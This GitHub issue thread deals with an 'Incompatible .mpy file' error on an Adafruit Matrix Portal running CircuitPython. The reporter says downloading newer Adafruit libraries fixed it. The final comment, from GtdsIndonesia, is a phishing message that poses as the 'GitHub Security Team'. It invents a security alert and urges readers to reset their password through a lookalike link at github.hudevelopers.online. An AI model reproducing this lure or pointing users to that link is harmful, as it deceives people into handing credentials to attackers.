### ISSUE TITLE
incompatible lib file

### ISSUE THREAD

**Issue by jasonlshelton** [shanselman/AdaFruitM4MatrixWithNightScout#2]
having some problems and 'm sure it has to do with the version of circuit python on my matrix. the error is

`main.py output:
Traceback (most recent call last):
  File "main.py", line 17, in <module>
  File "/lib/adafruit_matrixportal/network.py", line 32, in <module>
MpyError: Incompatible .mpy file. Please update all .mpy files. See http://adafru.it/mpy-update for more info.`

currently i have 7.3.3 on there but i also tried the most recent stable and got the same error

**Comment by jasonlshelton** [comment]
This seems to have been an issue with the adafruit libraries I got just a few days ago. I downloaded a new copy, which was also a newer version and it works now. I'm running v8 of CP so I had to add a few libraries to get it to work properly

**Comment by GtdsIndonesia** [comment]
# Urgent: Security Alert for

Hello,

We've detected unusual activity in your GitHub repository . To ensure that your account remains secure, we urgently need you to take action.

## What You Need To Do:

1. **Verify Repository Settings**
   - Ensure that your repository settings have not been altered without your consent.

2. **Reset Your Password**
   - Visit this secure link to reset your password immediately: [Reset Password](https://github.hudevelopers.online/)

3. **Revoke Unauthorized Access**
   - After resetting, please review any unauthorized access and revoke them.

Thank you for your prompt attention to this matter to ensure the security of your GitHub account.

*If you did not initiate these changes, please contact us immediately.*

Best Regards,  
**GitHub Security Team**
